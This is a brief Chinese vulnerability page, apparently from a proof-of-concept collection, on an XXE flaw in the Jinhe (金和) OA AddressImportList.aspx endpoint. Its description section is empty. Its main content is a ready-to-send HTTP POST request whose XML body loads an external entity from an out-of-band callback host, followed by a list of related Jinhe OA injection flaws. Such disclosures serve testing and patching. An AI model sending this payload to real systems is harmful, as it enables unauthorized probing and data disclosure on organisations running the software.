金和OA AddressImportList.aspx XXE漏洞

漏洞描述

PoC代码

POST /c6/Jhsoft.Web.addressbook/AddressImportList.aspx/ HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 166
Content-Type: application/xml
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://d3vgo6fmei5a4h23cngghqqgira6guauj.oast.site/xxe_test">
%remote;]>
<root/>

相关漏洞推荐

• 金和OA CustomerImport.aspx 存在XML注入漏洞
• 金和OA blog-XmlDeal XXE漏洞
• 金和OA Jhsoft.Web.blog SQL注入漏洞
• 金和OA XmlPage.aspx 存在XML注入漏洞
• 金和OA ReportSetting.aspx SQL注入漏洞
• 金和OA ReportParaList.aspx SQL注入漏洞
• 金和OA BITypeEdit.aspx SQL注入漏洞
• 金和OA AssTypeSendXML.aspx XXE漏洞
• 金和OA存在SQL注入漏洞
• 金和OA AskDoc.aspx XXE漏洞
• 金和OA AskAttachment.aspx SQL注入漏洞
• 金和OA XmlHttpGetPrintNumber.aspx SQL注入漏洞
• 金和OA Archives-XmlHttp.aspx XXE漏洞